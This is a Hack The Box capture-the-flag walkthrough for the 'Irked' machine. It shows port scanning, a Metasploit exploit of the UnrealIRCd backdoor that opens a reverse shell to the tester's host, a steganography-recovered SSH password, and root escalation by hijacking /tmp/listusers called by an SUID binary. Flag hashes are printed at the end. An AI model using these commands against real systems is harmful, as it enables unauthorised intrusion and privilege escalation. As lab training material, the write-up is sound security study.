Irked
About
Irked is a pretty simple and straight-forward box which requires basic enumeration skills. It shows the need to scan all ports on machines and to investigate any out of the place binaries found while enumerating a system.
Enumeration
Running the script portscan.sh reveals 4 attack vectors, SSH, HTTP, RPC and IRC.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sudo portscan.sh 10.129.41.31
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ cat PortScan\(10.129.41.31\)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34709/tcp status
| 100024 1 38216/udp status
| 100024 1 44632/udp6 status
|_ 100024 1 47393/tcp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34709/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation
IRC
Using searchsploit-prettify.py, I’m able to find 4 public vulnerabilities for UnrealIRCd.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ searchsploit-prettify.py UnrealIRCd
-------------------------------------------------------------- -----------------------------------------------------
| Exploit Title | Path |
-------------------------------------------------------------- -----------------------------------------------------
| UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | /usr/share/exploitdb/exploits/linux/remote/16922.rb |
| UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | /usr/share/exploitdb/exploits/windows/dos/18011.txt |
| UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | /usr/share/exploitdb/exploits/linux/remote/13853.pl |
| UnrealIRCd 3.x - Remote Denial of Service | /usr/share/exploitdb/exploits/windows/dos/27407.pl |
-------------------------------------------------------------- -----------------------------------------------------
Using the Metasploit module found, I’m able to gain a shell as the user ircd.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ msfconsole -q -x 'use exploit/unix/irc/unreal_ircd_3281_backdoor; set RHOSTS 10.129.41.31; set RPORT 6697; set PAYLOAD payload/cmd/unix/reverse; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
RHOSTS => 10.129.41.31
RPORT => 6697
PAYLOAD => cmd/unix/reverse
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP double handler on 10.10.16.9:4444
[*] 10.129.41.31:6697 - Connected to 10.129.41.31:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.129.41.31:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QAsX11I49Qk0Ifo1;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "QAsX11I49Qk0Ifo1\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.16.9:4444 -> 10.129.41.31:40025) at 2023-11-01 22:18:33 -0400
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
Lateral Movement
After some enumeration, I’m able to find a file .backup which reveals a passphrase UPupDOWNdownLRlrBAbaSSss for steganography.
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
As the file mentioned steganography, I’ll start by checking the image file that is shown on the index page for the HTTP service.
After downloading and decoding the file with the passpharse UPupDOWNdownLRlrBAbaSSss, I’m able to extract pass.txt which contains a password Kab6h+m+bbp2J:HG.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ wget -q http://10.129.41.31/irked.jpg
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
With the credential djmardov:Kab6h+m+bbp2J:HG, I’m able to gain a shell as the user djmardov.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sshpass -p 'Kab6h+m+bbp2J:HG' ssh djmardov@10.129.41.31
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
Privilege Escalation
Checking for a file with SUID set, I’m able to find an interesting binary /usr/bin/viewuser.
djmardov@irked:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
Based on the execution results, viewuser seems to be executing who, which is successful, and /tmp/listusers, which fails as the file does not exist.
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-11-07 21:05 (:0)
djmardov pts/0 2023-11-07 21:08 (10.10.16.9)
sh: 1: /tmp/listusers: not found
In order to further analyze the binary, I’ll exfiltrate the file using scp.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ sshpass -p 'Kab6h+m+bbp2J:HG' scp djmardov@10.129.41.31:/usr/bin/viewuser viewuser
I’ll then disassemble the binary viewuser using gdb.
┌──(m0nk3y@kali)-[~/HTB/Irked]
└─$ gdb viewuser
GNU gdb (Debian 13.2-1) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from viewuser...
(No debugging symbols found in viewuser)
gdb-peda$ disas main
Dump of assembler code for function main:
0x0000057d <+0>: lea ecx,[esp+0x4]
0x00000581 <+4>: and esp,0xfffffff0
0x00000584 <+7>: push DWORD PTR [ecx-0x4]
0x00000587 <+10>: push ebp
0x00000588 <+11>: mov ebp,esp
0x0000058a <+13>: push ebx
0x0000058b <+14>: push ecx
0x0000058c <+15>: call 0x480 <__x86.get_pc_thunk.bx>
0x00000591 <+20>: add ebx,0x1a6f
0x00000597 <+26>: sub esp,0xc
0x0000059a <+29>: lea eax,[ebx-0x1980]
0x000005a0 <+35>: push eax
0x000005a1 <+36>: call 0x3f0 <puts@plt>
0x000005a6 <+41>: add esp,0x10
0x000005a9 <+44>: sub esp,0xc
0x000005ac <+47>: lea eax,[ebx-0x1938]
0x000005b2 <+53>: push eax
0x000005b3 <+54>: call 0x3f0 <puts@plt>
0x000005b8 <+59>: add esp,0x10
0x000005bb <+62>: sub esp,0xc
0x000005be <+65>: lea eax,[ebx-0x1913]
0x000005c4 <+71>: push eax
0x000005c5 <+72>: call 0x400 <system@plt>
0x000005ca <+77>: add esp,0x10
0x000005cd <+80>: sub esp,0xc
0x000005d0 <+83>: push 0x0
0x000005d2 <+85>: call 0x420 <setuid@plt>
0x000005d7 <+90>: add esp,0x10
0x000005da <+93>: sub esp,0xc
0x000005dd <+96>: lea eax,[ebx-0x190f]
0x000005e3 <+102>: push eax
0x000005e4 <+103>: call 0x400 <system@plt>
0x000005e9 <+108>: add esp,0x10
0x000005ec <+111>: mov eax,0x0
0x000005f1 <+116>: lea esp,[ebp-0x8]
0x000005f4 <+119>: pop ecx
0x000005f5 <+120>: pop ebx
0x000005f6 <+121>: pop ebp
0x000005f7 <+122>: lea esp,[ecx-0x4]
0x000005fa <+125>: ret
End of assembler dump.
gdb-peda$ x/s main+20+0x1a6f-0x1980
0x680: "This application is being devleoped to set and test user permissions"
gdb-peda$ x/s main+20+0x1a6f-0x1938
0x6c8: "It is still being actively developed"
gdb-peda$ x/s main+20+0x1a6f-0x1913
0x6ed: "who"
gdb-peda$ x/s main+20+0x1a6f-0x190f
0x6f1: "/tmp/listusers"
Reverse engineering the binary reveals a simple program which executes /tmp/listusers with an EUID of root.
int main(void)
{
puts("This application is being devleoped to set and test user permissions");
puts("It is still being actively developed");
system("who");
setuid(0);
system("/tmp/listusers");
return 0;
}
By copying the binary /bin/bash as /tmp/listusers and running viewuser, I’m able to gain a shell as the user root.
djmardov@irked:~$ cp /bin/bash /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2023-11-07 21:05 (:0)
djmardov pts/0 2023-11-07 21:08 (10.10.16.9)
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
root@irked:~# cat /home/djmardov/user.txt
e6f46281d480a2b6d5512f30f80b53c5
root@irked:~# cat /root/root.txt
6668e6efd551778c4460f76cee9dbda0